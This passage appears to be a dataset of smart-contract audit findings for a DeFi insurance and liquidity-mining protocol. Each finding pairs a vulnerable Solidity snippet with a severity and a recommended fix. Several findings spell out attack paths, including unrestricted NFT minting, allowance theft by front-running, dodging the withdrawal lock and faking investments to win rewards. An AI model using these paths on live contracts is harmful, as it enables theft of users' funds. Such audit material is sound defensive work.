This might cause discrepancy in the case where the original value of `_amount` was `type(uint256).max`.\\n```\\nfunction \\_borrow(\\n address \\_market,\\n address \\_tokenAddr,\\n uint256 \\_amount,\\n uint256 \\_rateMode,\\n address \\_to,\\n address \\_onBehalf\\n) internal returns (uint256) {\\n ILendingPoolV2 lendingPool = getLendingPool(\\_market);\\n\\n // defaults to onBehalf of proxy\\n if (\\_onBehalf == address(0)) {\\n \\_onBehalf = address(this);\\n }\\n\\n lendingPool.borrow(\\_tokenAddr, \\_amount, \\_rateMode, AAVE\\_REFERRAL\\_CODE, \\_onBehalf);\\n\\n \\_tokenAddr.withdrawTokens(\\_to, \\_amount);\\n\\n logger.Log(\\n address(this),\\n msg.sender,\\n \"AaveBorrow\",\\n abi.encode(\\_market, \\_tokenAddr, \\_amount, \\_rateMode, \\_to, \\_onBehalf)\\n );\\n\\n return \\_amount;\\n}\\n```\\n\\n```\\nfunction withdrawTokens(\\n address \\_token,\\n address \\_to,\\n uint256 \\_amount\\n) internal returns (uint256) {\\n if (\\_amount == type(uint256).max) {\\n \\_amount = getBalance(\\_token, address(this));\\n }\\n```\\nчThe return value can be used to validate the withdrawal or used in the event emitted.чч```\\nfunction \\_borrow(\\n address \\_market,\\n address \\_tokenAddr,\\n uint256 \\_amount,\\n uint256 \\_rateMode,\\n address \\_to,\\n address \\_onBehalf\\n) internal returns (uint256) {\\n ILendingPoolV2 lendingPool = getLendingPool(\\_market);\\n\\n // defaults to onBehalf of proxy\\n if (\\_onBehalf == address(0)) {\\n \\_onBehalf = address(this);\\n }\\n\\n lendingPool.borrow(\\_tokenAddr, \\_amount, \\_rateMode, AAVE\\_REFERRAL\\_CODE, \\_onBehalf);\\n\\n \\_tokenAddr.withdrawTokens(\\_to, \\_amount);\\n\\n logger.Log(\\n address(this),\\n msg.sender,\\n \"AaveBorrow\",\\n abi.encode(\\_market, \\_tokenAddr, \\_amount, \\_rateMode, \\_to, \\_onBehalf)\\n );\\n\\n return \\_amount;\\n}\\n```\\n -Anyone is able to mint NFTs by calling mintNFTsForLMчhighчThe contract `LiquidityMiningNFT` has the method `mintNFTsForLM`.\\n```\\nfunction 
mintNFTsForLM(address \\_liquidiyMiningAddr) external {\\n uint256[] memory \\_ids = new uint256[](NFT\\_TYPES\\_COUNT);\\n uint256[] memory \\_amounts = new uint256[](NFT\\_TYPES\\_COUNT);\\n\\n \\_ids[0] = 1;\\n \\_amounts[0] = 5;\\n\\n \\_ids[1] = 2;\\n \\_amounts[1] = 1 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[2] = 3;\\n \\_amounts[2] = 3 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[3] = 4;\\n \\_amounts[3] = 6 \\* LEADERBOARD\\_SIZE;\\n\\n \\_mintBatch(\\_liquidiyMiningAddr, \\_ids, \\_amounts, \"\");\\n}\\n```\\n\\nHowever, this contract does not have any kind of special permissions to limit who is able to mint tokens.\\nAn attacker could call `LiquidityMiningNFT.mintNFTsForLM(0xhackerAddress)` to mint tokens for their address and sell them on the marketplace. They are also allowed to mint as many tokens as they want by calling the method multiple times.чAdd some permissions to limit only some actors to mint tokens.чч```\\nfunction mintNFTsForLM(address \\_liquidiyMiningAddr) external {\\n uint256[] memory \\_ids = new uint256[](NFT\\_TYPES\\_COUNT);\\n uint256[] memory \\_amounts = new uint256[](NFT\\_TYPES\\_COUNT);\\n\\n \\_ids[0] = 1;\\n \\_amounts[0] = 5;\\n\\n \\_ids[1] = 2;\\n \\_amounts[1] = 1 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[2] = 3;\\n \\_amounts[2] = 3 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[3] = 4;\\n \\_amounts[3] = 6 \\* LEADERBOARD\\_SIZE;\\n\\n \\_mintBatch(\\_liquidiyMiningAddr, \\_ids, \\_amounts, \"\");\\n}\\n```\\n -A liquidity provider can withdraw all his funds anytimeчhighчSince some users provide liquidity to sell the insurance policies, it is important that these providers cannot withdraw their funds when the security breach happens and the policyholders are submitting claims. 
The liquidity providers can only request their funds first and withdraw them later (in a week).\\n```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n WithdrawalStatus \\_status = getWithdrawalStatus(msg.sender);\\n\\n require(\\_status == WithdrawalStatus.NONE || \\_status == WithdrawalStatus.EXPIRED,\\n \"PB: Can't request withdrawal\");\\n\\n uint256 \\_daiTokensToWithdraw = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n uint256 \\_availableDaiBalance = balanceOf(msg.sender).mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (block.timestamp < liquidityMining.getEndLMTime().add(neededTimeAfterLM)) {\\n \\_availableDaiBalance = \\_availableDaiBalance.sub(liquidityFromLM[msg.sender]);\\n }\\n\\n require(totalLiquidity >= totalCoverTokens.add(\\_daiTokensToWithdraw),\\n \"PB: Not enough liquidity\");\\n\\n require(\\_availableDaiBalance >= \\_daiTokensToWithdraw, \"PB: Wrong announced amount\");\\n\\n WithdrawalInfo memory \\_newWithdrawalInfo;\\n \\_newWithdrawalInfo.amount = \\_tokensToWithdraw;\\n \\_newWithdrawalInfo.readyToWithdrawDate = block.timestamp.add(withdrawalPeriod);\\n\\n withdrawalsInfo[msg.sender] = \\_newWithdrawalInfo;\\n emit RequestWithdraw(msg.sender, \\_tokensToWithdraw, \\_newWithdrawalInfo.readyToWithdrawDate);\\n}\\n```\\n\\n```\\nfunction withdrawLiquidity() external override {\\n require(getWithdrawalStatus(msg.sender) == WithdrawalStatus.READY,\\n \"PB: Withdrawal is not ready\");\\n\\n uint256 \\_tokensToWithdraw = withdrawalsInfo[msg.sender].amount;\\n uint256 \\_daiTokensToWithdraw = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (withdrawalQueue.length != 0 || totalLiquidity.sub(\\_daiTokensToWithdraw) < totalCoverTokens) {\\n withdrawalQueue.push(msg.sender);\\n } else {\\n \\_withdrawLiquidity(msg.sender, \\_tokensToWithdraw);\\n }\\n}\\n```\\n\\nThere is a restriction in `requestWithdrawal` that requires the liquidity provider to have 
enough funds at the moment of request:\\n```\\nrequire(totalLiquidity >= totalCoverTokens.add(\\_daiTokensToWithdraw),\\n \"PB: Not enough liquidity\");\\n\\nrequire(\\_availableDaiBalance >= \\_daiTokensToWithdraw, \"PB: Wrong announced amount\");\\n```\\n\\nBut after the request is created, these funds can then be transferred to another address. When the request is created, the provider should wait for 7 days, and then there will be 2 days to withdraw the requested amount:\\n```\\nwithdrawalPeriod = 1 weeks;\\nwithdrawalExpirePeriod = 2 days;\\n```\\n\\nThe attacker would have 4 addresses that will send the pool tokens to each other and request withdrawal of the full amount one by one every 2 days. So at least one of the addresses can withdraw all of the funds at any point in time. If the liquidity provider needs to withdraw funds immediately, he should transfer all funds to that address and execute the withdrawal.чResolution\\nThe funds are now locked when the withdrawal is requested, so funds cannot be transferred after the request, and this bug cannot be exploited anymore.\\nOne of the solutions would be to block the DAIx tokens from being transferred after the withdrawal request.чч```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n WithdrawalStatus \\_status = getWithdrawalStatus(msg.sender);\\n\\n require(\\_status == WithdrawalStatus.NONE || \\_status == WithdrawalStatus.EXPIRED,\\n \"PB: Can't request withdrawal\");\\n\\n uint256 \\_daiTokensToWithdraw = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n uint256 \\_availableDaiBalance = balanceOf(msg.sender).mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (block.timestamp < liquidityMining.getEndLMTime().add(neededTimeAfterLM)) {\\n \\_availableDaiBalance = \\_availableDaiBalance.sub(liquidityFromLM[msg.sender]);\\n }\\n\\n require(totalLiquidity >= totalCoverTokens.add(\\_daiTokensToWithdraw),\\n \"PB: Not enough liquidity\");\\n\\n 
require(\\_availableDaiBalance >= \\_daiTokensToWithdraw, \"PB: Wrong announced amount\");\\n\\n WithdrawalInfo memory \\_newWithdrawalInfo;\\n \\_newWithdrawalInfo.amount = \\_tokensToWithdraw;\\n \\_newWithdrawalInfo.readyToWithdrawDate = block.timestamp.add(withdrawalPeriod);\\n\\n withdrawalsInfo[msg.sender] = \\_newWithdrawalInfo;\\n emit RequestWithdraw(msg.sender, \\_tokensToWithdraw, \\_newWithdrawalInfo.readyToWithdrawDate);\\n}\\n```\\n -The buyPolicyFor/addLiquidityFor should transfer funds from msg.senderчhighчWhen calling the buyPolicyFor/addLiquidityFor functions, are called with the parameter _policyHolderAddr/_liquidityHolderAddr who is going to be the beneficiary in buying policy/adding liquidity:\\n```\\nfunction buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens \\n) external override {\\n \\_buyPolicyFor(\\_policyHolderAddr, \\_epochsNumber, \\_coverTokens);\\n}\\n```\\n\\n```\\nfunction addLiquidityFor(address \\_liquidityHolderAddr, uint256 \\_liquidityAmount) external override {\\n \\_addLiquidityFor(\\_liquidityHolderAddr, \\_liquidityAmount, false);\\n}\\n```\\n\\nDuring the execution, the funds for the policy/liquidity are transferred from the _policyHolderAddr/_liquidityHolderAddr, while it's usually expected that they should be transferred from `msg.sender`. Because of that, anyone can call a function on behalf of a user that gave the allowance to the `PolicyBook`.\\nFor example, a user(victim) wants to add some DAI to the liquidity pool and gives allowance to the `PolicyBook`. After that, the user should call `addLiquidity`, but the attacker can front-run this transaction and buy a policy on behalf of the victim instead.\\nAlso, there is a curious edge case that makes this issue Critical: _policyHolderAddr/_liquidityHolderAddr parameters can be equal to the address of the `PolicyBook` contract. 
That may lead to multiple different dangerous attack vectors.чMake sure that nobody can transfer funds on behalf of the users if it's not intended.чч```\\nfunction buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens \\n) external override {\\n \\_buyPolicyFor(\\_policyHolderAddr, \\_epochsNumber, \\_coverTokens);\\n}\\n```\\n -LiquidityMining can't accept single ERC1155 tokensчhighчThe contract `LiquidityMining` is also defined as an `ERC1155Receiver`\\n```\\ncontract LiquidityMining is ILiquidityMining, ERC1155Receiver, Ownable {\\n```\\n\\nThe finalized EIP-1155 standard states that a contract which acts as an EIP-1155 Receiver must implement all the functions in the `ERC1155TokenReceiver` interface to be able to accept transfers.\\nThese are indeed implemented here:\\n```\\nfunction onERC1155Received(\\n```\\n\\n```\\nfunction onERC1155BatchReceived(\\n```\\n\\nThe standard states that they will be called and they MUST return a specific `byte4` value, otherwise the transfer will fail.\\nHowever one of the methods returns an incorrect value. 
This seems to be an error generated by a copy/paste action.\n```\nfunction onERC1155Received(\n address operator,\n address from,\n uint256 id,\n uint256 value,\n bytes memory data\n)\n external\n pure\n override\n returns(bytes4)\n{\n return bytes4(keccak256(\"onERC1155BatchReceived(address,address,uint256[],uint256[],bytes)\"));\n}\n```\n\nThe value returned is equal to\n`bytes4(keccak256(\"onERC1155BatchReceived(address,address,uint256[],uint256[],bytes)\"));`\nBut it should be\n`bytes4(keccak256(\"onERC1155Received(address,address,uint256,uint256,bytes)\"))`.\nOn top of this, the contract MUST implement the ERC-165 standard to correctly respond to `supportsInterface`.чChange the return value of `onERC1155Received` to be equal to `0xf23a6e61` which represents `bytes4(keccak256(\"onERC1155Received(address,address,uint256,uint256,bytes)\"))`.\nAlso, make sure to implement `supportsInterface` to signify support of `ERC1155TokenReceiver` to accept transfers.\nAdd tests to check the functionality is correct and make sure these kinds of bugs do not exist in the future.\nMake sure to read the EIP-1155 and EIP-165 standards in detail and implement them correctly.чч```\ncontract LiquidityMining is ILiquidityMining, ERC1155Receiver, Ownable {\n```\n -DAI is assumed to have the same price as DAIx in the staking contractчhighчWhen a liquidity provider stakes tokens to the `BMIDAIStaking` contract, the equal amount of DAI and DAIx are transferred from the pool contract.\n```\nfunction \_stakeDAIx(address \_user, uint256 \_amount, address \_policyBookAddr) internal {\n require (\_amount > 0, \"BMIDAIStaking: Can't stake zero tokens\");\n\n PolicyBook \_policyBook = PolicyBook(\_policyBookAddr);\n // transfer DAI from PolicyBook to yield generator\n daiToken.transferFrom(\_policyBookAddr, address(defiYieldGenerator), \_amount); \n\n // transfer bmiDAIx from user to staking\n \_policyBook.transferFrom(\_user, address(this), 
\\_amount); \\n\\n \\_mintNFT(\\_user, \\_amount, \\_policyBook);\\n}\\n```\\nчOnly the corresponding amount of DAI should be transferred to the pool.чч```\\nfunction \\_stakeDAIx(address \\_user, uint256 \\_amount, address \\_policyBookAddr) internal {\\n require (\\_amount > 0, \"BMIDAIStaking: Can't stake zero tokens\");\\n\\n PolicyBook \\_policyBook = PolicyBook(\\_policyBookAddr);\\n // transfer DAI from PolicyBook to yield generator\\n daiToken.transferFrom(\\_policyBookAddr, address(defiYieldGenerator), \\_amount); \\n\\n // transfer bmiDAIx from user to staking\\n \\_policyBook.transferFrom(\\_user, address(this), \\_amount); \\n\\n \\_mintNFT(\\_user, \\_amount, \\_policyBook);\\n}\\n```\\n -_updateWithdrawalQueue can run out of gasчhighчWhen there's not enough collateral to withdraw liquidity from a policy book, the withdrawal request is added to a queue. The queue is supposed to be processed and cleared once there are enough funds for that. The only way to do so is the `_updateWithdrawalQueue` function that is caller when new liquidity is added:\\n```\\nfunction \\_updateWithdrawalQueue() internal {\\n uint256 \\_availableLiquidity = totalLiquidity.sub(totalCoverTokens);\\n uint256 \\_countToRemoveFromQueue;\\n\\n for (uint256 i = 0; i < withdrawalQueue.length; i++) { \\n uint256 \\_tokensToWithdraw = withdrawalsInfo[withdrawalQueue[i]].amount;\\n uint256 \\_amountInDai = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (balanceOf(withdrawalQueue[i]) < \\_tokensToWithdraw) {\\n \\_countToRemoveFromQueue++;\\n continue;\\n }\\n\\n if (\\_availableLiquidity >= \\_amountInDai) {\\n \\_withdrawLiquidity(withdrawalQueue[i], \\_tokensToWithdraw);\\n \\_availableLiquidity = \\_availableLiquidity.sub(\\_amountInDai);\\n \\_countToRemoveFromQueue++;\\n } else {\\n break;\\n }\\n }\\n\\n \\_removeFromQueue(\\_countToRemoveFromQueue);\\n}\\n```\\n\\nThe problem is that this function can only process all queue until the pool run out of 
available funds or the whole queue is going to be processed. If the queue is big enough, this process can be stuck.чPass the parameter to the `_updateWithdrawalQueue` that defines how many requests to process in the queue per one call.чч```\\nfunction \\_updateWithdrawalQueue() internal {\\n uint256 \\_availableLiquidity = totalLiquidity.sub(totalCoverTokens);\\n uint256 \\_countToRemoveFromQueue;\\n\\n for (uint256 i = 0; i < withdrawalQueue.length; i++) { \\n uint256 \\_tokensToWithdraw = withdrawalsInfo[withdrawalQueue[i]].amount;\\n uint256 \\_amountInDai = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (balanceOf(withdrawalQueue[i]) < \\_tokensToWithdraw) {\\n \\_countToRemoveFromQueue++;\\n continue;\\n }\\n\\n if (\\_availableLiquidity >= \\_amountInDai) {\\n \\_withdrawLiquidity(withdrawalQueue[i], \\_tokensToWithdraw);\\n \\_availableLiquidity = \\_availableLiquidity.sub(\\_amountInDai);\\n \\_countToRemoveFromQueue++;\\n } else {\\n break;\\n }\\n }\\n\\n \\_removeFromQueue(\\_countToRemoveFromQueue);\\n}\\n```\\n -The PolicyBook should make DAI transfers inside the contractчmediumчThe `PolicyBook` contract gives full allowance over DAI tokens to the other contracts:\\n```\\nfunction approveAllDaiTokensForStakingAndVotingAndTransferOwnership() internal {\\n daiToken.approve(address(bmiDaiStaking), MAX\\_INT); \\n daiToken.approve(address(claimVoting), MAX\\_INT); \\n\\n transferOwnership(address(bmiDaiStaking));\\n}\\n```\\n\\nThat behavior is dangerous because it's hard to keep track of and control the contract's DAI balance. And it's also hard to track in the code where the balance of the `PolicyBook` can be changed from.чIt's better to perform all the transfers inside the `PolicyBook` contract. 
So if the `bmiDaiStaking` and the `claimVoting` contracts need DAI tokens from the `PolicyBook`, they should call some function of the `PolicyBook` to perform transfers.чч```\\nfunction approveAllDaiTokensForStakingAndVotingAndTransferOwnership() internal {\\n daiToken.approve(address(bmiDaiStaking), MAX\\_INT); \\n daiToken.approve(address(claimVoting), MAX\\_INT); \\n\\n transferOwnership(address(bmiDaiStaking));\\n}\\n```\\n -The totalCoverTokens is only updated when the policy is boughtчmediumчThe `totalCoverTokens` value represents the amount of collateral that needs to be locked in the policy book. It should be changed either by buying a new policy or when an old policy expires. The problem is that when the old policy expires, this value is not updated; it is only updated when someone buys a policy by calling the `_updateEpochsInfo` function:\\n```\\nfunction \\_updateEpochsInfo() internal {\\n uint256 \\_totalEpochTime = block.timestamp.sub(epochStartTime);\\n uint256 \\_countOfPassedEpoch = \\_totalEpochTime.div(epochDuration);\\n\\n uint256 \\_lastEpochUpdate = currentEpochNumber;\\n currentEpochNumber = \\_countOfPassedEpoch.add(1);\\n\\n for (uint256 i = \\_lastEpochUpdate; i < currentEpochNumber; i++) {\\n totalCoverTokens = totalCoverTokens.sub(epochAmounts[i]);\\n delete epochAmounts[i];\\n }\\n}\\n```\\n\\nUsers waiting to withdraw liquidity should wait for someone to buy the policy to update the `totalCoverTokens`.чResolution\\nThe `updateEpochsInfo` function is now public and can be called by anyone.\\nMake sure it's possible to call the `_updateEpochsInfo` function without buying a new policy.чч```\\nfunction \\_updateEpochsInfo() internal {\\n uint256 \\_totalEpochTime = block.timestamp.sub(epochStartTime);\\n uint256 \\_countOfPassedEpoch = \\_totalEpochTime.div(epochDuration);\\n\\n uint256 \\_lastEpochUpdate = currentEpochNumber;\\n currentEpochNumber = \\_countOfPassedEpoch.add(1);\\n\\n for (uint256 i = \\_lastEpochUpdate; i < 
currentEpochNumber; i++) {\\n totalCoverTokens = totalCoverTokens.sub(epochAmounts[i]);\\n delete epochAmounts[i];\\n }\\n}\\n```\\n -Unbounded loops in LiquidityMiningчmediumчThere are some methods that have unbounded loops and will fail when enough items exist in the arrays.\\n```\\nfor (uint256 i = 0; i < \\_teamsNumber; i++) {\\n```\\n\\n```\\nfor (uint256 i = 0; i < \\_membersNumber; i++) {\\n```\\n\\n```\\nfor (uint256 i = 0; i < \\_usersNumber; i++) {\\n```\\n\\nThese methods will fail when lots of items will be added to them.чConsider adding limits (from, to) when requesting the items.чч```\\nfor (uint256 i = 0; i < \\_teamsNumber; i++) {\\n```\\n -The _removeFromQueue is very gas greedyчmediumчThe `_removeFromQueue` function is supposed to remove `_countToRemove` elements from the queue:\\n```\\nfunction \\_removeFromQueue(uint256 \\_countToRemove) internal {\\n for (uint256 i = 0; i < \\_countToRemove; i++) {\\n delete withdrawalsInfo[withdrawalQueue[i]];\\n } \\n\\n if (\\_countToRemove == withdrawalQueue.length) {\\n delete withdrawalQueue;\\n } else {\\n uint256 \\_remainingArrLength = withdrawalQueue.length.sub(\\_countToRemove);\\n address[] memory \\_remainingArr = new address[](\\_remainingArrLength);\\n\\n for (uint256 i = 0; i < \\_remainingArrLength; i++) {\\n \\_remainingArr[i] = withdrawalQueue[i.add(\\_countToRemove)];\\n }\\n\\n withdrawalQueue = \\_remainingArr;\\n }\\n}\\n```\\n\\nThis function uses too much gas, which makes it easier to make attacks on the system. Even if only one request is removed and executed, this function rewrites all the requests to the storage.чThe data structure should be changed so this function shouldn't rewrite the requests that did not change. 
For example, it can be a mapping `(uint => address)` with 2 indexes `(start, end)` that are only increasing.чч```\\nfunction \\_removeFromQueue(uint256 \\_countToRemove) internal {\\n for (uint256 i = 0; i < \\_countToRemove; i++) {\\n delete withdrawalsInfo[withdrawalQueue[i]];\\n } \\n\\n if (\\_countToRemove == withdrawalQueue.length) {\\n delete withdrawalQueue;\\n } else {\\n uint256 \\_remainingArrLength = withdrawalQueue.length.sub(\\_countToRemove);\\n address[] memory \\_remainingArr = new address[](\\_remainingArrLength);\\n\\n for (uint256 i = 0; i < \\_remainingArrLength; i++) {\\n \\_remainingArr[i] = withdrawalQueue[i.add(\\_countToRemove)];\\n }\\n\\n withdrawalQueue = \\_remainingArr;\\n }\\n}\\n```\\n -Withdrawal with zero amount is possibleчmediumчWhen creating a withdrawal request, the amount of tokens to withdraw is passed as a parameter:\\n```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n```\\n\\nThe problem is that this parameter can be zero, and the function will be successfully executed. Moreover, this request can then be added to the queue, and the actual withdrawal will also be executed with zero value. Addresses that never added any liquidity could spam the system with these requests.чDo not allow withdrawals of zero tokens.чч```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n```\\n -The withdrawal queue is only updated when the liquidity is addedчmediumчSometimes when the amount of liquidity is not much higher than the number of tokens locked for the collateral, it's impossible to withdraw liquidity. For a user that wants to withdraw liquidity, a withdrawal request is created. If the request can't be executed, it's added to the withdrawal queue, and the user needs to wait until there's enough collateral for withdrawal.
There are potentially 2 ways to achieve that: either someone adds more liquidity or some existing policies expire.\\nCurrently, the queue can only be cleared when the internal `_updateWithdrawalQueue` function is called. And it is only called in one place while adding liquidity:\\n```\\nfunction \\_addLiquidityFor(address \\_liquidityHolderAddr, uint256 \\_liquidityAmount, bool \\_isLM) internal {\\n daiToken.transferFrom(\\_liquidityHolderAddr, address(this), \\_liquidityAmount); \\n \\n uint256 \\_amountToMint = \\_liquidityAmount.mul(PERCENTAGE\\_100).div(getDAIToDAIxRatio());\\n totalLiquidity = totalLiquidity.add(\\_liquidityAmount);\\n \\_mintERC20(\\_liquidityHolderAddr, \\_amountToMint);\\n\\n if (\\_isLM) {\\n liquidityFromLM[\\_liquidityHolderAddr] = liquidityFromLM[\\_liquidityHolderAddr].add(\\_liquidityAmount);\\n }\\n\\n \\_updateWithdrawalQueue();\\n\\n emit AddLiquidity(\\_liquidityHolderAddr, \\_liquidityAmount, totalLiquidity);\\n}\\n```\\nчIt would be better if the queue could be processed when some policies expire without adding new liquidity. 
For example, there may be an external function that allows users to process the queue.чч```\\nfunction \\_addLiquidityFor(address \\_liquidityHolderAddr, uint256 \\_liquidityAmount, bool \\_isLM) internal {\\n daiToken.transferFrom(\\_liquidityHolderAddr, address(this), \\_liquidityAmount); \\n \\n uint256 \\_amountToMint = \\_liquidityAmount.mul(PERCENTAGE\\_100).div(getDAIToDAIxRatio());\\n totalLiquidity = totalLiquidity.add(\\_liquidityAmount);\\n \\_mintERC20(\\_liquidityHolderAddr, \\_amountToMint);\\n\\n if (\\_isLM) {\\n liquidityFromLM[\\_liquidityHolderAddr] = liquidityFromLM[\\_liquidityHolderAddr].add(\\_liquidityAmount);\\n }\\n\\n \\_updateWithdrawalQueue();\\n\\n emit AddLiquidity(\\_liquidityHolderAddr, \\_liquidityAmount, totalLiquidity);\\n}\\n```\\n -Optimize gas usage when checking max length of arraysчlowчThere are a few cases where some arrays have to be limited to a number of items.\\nAnd the max size is enforced by removing the last item if the array reached max size + 1.\\n```\\nif (leaderboard.length == MAX\\_LEADERBOARD\\_SIZE.add(1)) {\\n leaderboard.pop();\\n}\\n```\\n\\n```\\nif (topUsers.length == MAX\\_TOP\\_USERS\\_SIZE.add(1)) {\\n topUsers.pop();\\n}\\n```\\n\\n```\\nif (\\_addresses.length == MAX\\_GROUP\\_LEADERS\\_SIZE.add(1)) {\\n groupsLeaders[\\_referralLink].pop();\\n}\\n```\\n\\nA simpler and cheaper way to check if an item should be removed is to change the condition to\\n```\\nif (limitedSizedArray.length > MAX\\_DEFINED\\_SIZE\\_FOR\\_ARRAY) {\\n limitedSizedArray.pop();\\n}\\n```\\n\\nThis check does not need or do a SafeMath call (which is more expensive), and because of the limited number of items, as well as a practical impossibility to add enough items to overflow the limit, makes it a preferred way to check the maximum limit.чRewrite the checks and remove SafeMath operations, as well as the addition by 1 and change the check to a “greater than” verification.чч```\\nif (leaderboard.length == 
MAX\\_LEADERBOARD\\_SIZE.add(1)) {\\n leaderboard.pop();\\n}\\n```\\n -Methods return values that are never usedчlowчWhen a user calls `investDAI` these 3 methods are called internally:\\n```\\n\\_updateTopUsers();\\n\\_updateLeaderboard(\\_userTeamInfo.teamAddr);\\n\\_updateGroupLeaders(\\_userTeamInfo.teamAddr);\\n```\\n\\nEach method returns a boolean, but the value is never used. It is also unclear what the value should represent.чRemove the returned variable or use it in method `investDAI`.чч```\\n\\_updateTopUsers();\\n\\_updateLeaderboard(\\_userTeamInfo.teamAddr);\\n\\_updateGroupLeaders(\\_userTeamInfo.teamAddr);\\n```\\n -Save some gas when looping over state arraysчlowчThere are a few loops over state arrays in `LiquidityMining`.\\n```\\nfor (uint256 i = 0; i < leaderboard.length; i++) {\\n```\\n\\n```\\nfor (uint256 i = 0; i < topUsers.length; i++) {\\n```\\n\\nConsider caching the length in a local variable to reduce gas costs.\\nSimilar to\\n```\\nuint256 \\_usersNumber = allUsers.length;\\n```\\n\\n```\\nfor (uint256 i = 0; i < \\_usersNumber; i++) {\\n```\\nчReduce gas cost by caching array state length in a local variable.чч```\\nfor (uint256 i = 0; i < leaderboard.length; i++) {\\n```\\n -Optimize gas costs when handling liquidity start and end timesчlowчWhen the `LiquidityMining` contract is deployed, `startLiquidityMiningTime` saves the current block timestamp.\\n```\\nstartLiquidityMiningTime = block.timestamp; \\n```\\n\\nThis value is never changed.\\nThere also exists an end limit calculated by `getEndLMTime`.\\n```\\nfunction getEndLMTime() public view override returns (uint256) {\\n return startLiquidityMiningTime.add(2 weeks);\\n}\\n```\\n\\nThis value is also fixed, once the start was defined.\\nNone of the values change after the contract was deployed.
This is why you can use the immutable feature provided by Solidity.\\nIt will reduce costs significantly.\\n```\\ncontract A {\\n uint public immutable start;\\n uint public immutable end;\\n \\n constructor() {\\n start = block.timestamp;\\n end = block.timestamp + 2 weeks;\\n }\\n}\\n```\\n\\nThis contract defines 2 variables: `start` and `end` and their value is fixed on deploy and cannot be changed.\\nIt does not need to use `SafeMath` because there's no risk of overflowing.\\nSetting `public` on both variables creates getters, and calling `A.start()` and `A.end()` returns the respective values.\\nHaving set as immutable does not request EVM storage and makes them very cheap to access.чUse Solidity's immutable feature to reduce gas costs and rename variables for consistency.\\nUse the example for inspiration.чч```\\nstartLiquidityMiningTime = block.timestamp; \\n```\\n -Computing the quote should be done for a positive amount of tokensчlowчWhen a policy is bought, a quote is requested from the `PolicyQuote` contract.\\n```\\nfunction \\_buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens\\n) internal {\\n```\\n\\n```\\nuint256 \\_totalPrice = policyQuote.getQuote(\\_totalSeconds, \\_coverTokens, address(this));\\n```\\n\\nThe `getQuote` call is then forwarded to an internal function\\n```\\nfunction getQuote(uint256 \\_durationSeconds, uint256 \\_tokens, address \\_policyBookAddr)\\n external view override returns (uint256 \\_daiTokens)\\n{\\n \\_daiTokens = \\_getQuote(\\_durationSeconds, \\_tokens, \\_policyBookAddr);\\n}\\n```\\n\\n```\\nfunction \\_getQuote(uint256 \\_durationSeconds, uint256 \\_tokens, address \\_policyBookAddr)\\n internal view returns (uint256)\\n{\\n```\\n\\nThere are some basic checks that make sure the total covered tokens with the requested quote do not exceed the total liquidity. 
On top of that check, it makes sure the total liquidity is positive.\\n```\\nrequire(\\_totalCoverTokens.add(\\_tokens) <= \\_totalLiquidity, \"PolicyBook: Requiring more than there exists\");\\nrequire(\\_totalLiquidity > 0, \"PolicyBook: The pool is empty\");\\n```\\n\\nBut there is no check for the number of quoted tokens. It should also be positive.чAdd an additional check for the number of quoted tokens to be positive. The check could fail or return 0, depending on your use case.\\nIf you add a check for the number of quoted tokens to be positive, the check for `_totalLiquidity` to be positive becomes obsolete and can be removed.чч```\\nfunction \\_buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens\\n) internal {\\n```\\n -Anyone can win all the funds from the LiquidityMining without investing any DAIчhighчWhen a user decides to `investDAI` in the `LiquidityMining` contract, the policy book address is passed as a parameter:\\n```\\nfunction investDAI(uint256 \\_tokensAmount, address \\_policyBookAddr) external override {\\n```\\n\\nBut this parameter is never checked and only used at the end of the function:\\n```\\nIPolicyBook(\\_policyBookAddr).addLiquidityFromLM(msg.sender, \\_tokensAmount);\\n```\\n\\nThe attacker can pass the address of a simple multisig that will process this transaction successfully without doing anything. And pretend to invest a lot of DAI without actually doing that to win all the rewards in the `LiquidityMining` contract.чCheck that the pool address is valid.чч```\\nfunction investDAI(uint256 \\_tokensAmount, address \\_policyBookAddr) external override {\\n```\\n -Liquidity withdrawal can be blockedчhighчThe main problem in that issue is that the liquidity provider may face many potential issues when withdrawing the liquidity. Under some circumstances, a normal user will never be able to withdraw the liquidity. 
This issue consists of multiple factors that are interconnected and share the same solution.\\nThere are no partial withdrawals when in the queue. When the withdrawal request is added to the queue, it can only be processed fully:\\n```\\naddress \\_currentAddr = withdrawalQueue.head();\\nuint256 \\_tokensToWithdraw = withdrawalsInfo[\\_currentAddr].withdrawalAmount;\\n \\nuint256 \\_amountInDAI = convertDAIXtoDAI(\\_tokensToWithdraw);\\n \\nif (\\_availableLiquidity < \\_amountInDAI) {\\n break;\\n}\\n```\\n\\nBut when the request is not in the queue, it can still be processed partially, and the rest of the locked tokens will wait in the queue.\\n```\\n} else if (\\_availableLiquidity < convertDAIXtoDAI(\\_tokensToWithdraw)) {\\n uint256 \\_availableDAIxTokens = convertDAIToDAIx(\\_availableLiquidity);\\n uint256 \\_currentWithdrawalAmount = \\_tokensToWithdraw.sub(\\_availableDAIxTokens);\\n withdrawalsInfo[\\_msgSender()].withdrawalAmount = \\_currentWithdrawalAmount;\\n \\n aggregatedQueueAmount = 